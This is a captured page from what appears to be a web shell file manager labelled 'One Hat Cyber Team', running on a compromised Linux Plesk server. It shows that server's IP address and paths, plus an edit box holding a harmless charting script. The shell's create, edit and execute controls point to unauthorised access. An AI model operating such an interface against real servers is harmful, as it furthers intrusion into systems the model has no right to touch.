⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
htdocs
/
modules
/
xovi
/
js
/
Edit File: dataChart.js
class XoviDataChart { constructor(settings) { this.url = settings.url; this._setLoadIcon(); } loadData(id, callback, queryParams) { XoviRequest.send(this.url, function (response) { $(id).update('<svg></svg>'); callback((response['data'] !== undefined ? response['data'] : [])); }, queryParams); } refreshData(queryParams, callback) { XoviRequest.send(this.url, function (response) { if (response['data'] !== undefined) { callback((response['data'] !== undefined ? response['data'] : [])); } }, queryParams); } _setLoadIcon() { $A(['pie', 'line']).each(function (type) { $$('div.' + type + '-body').each(function (div) { $(div).update('<div class="' + type + '-loader">' + '<img src="/modules/xovi/images/icons/indicator.gif" width="30" height="30">' + '</div>') }) }); } }
Simpan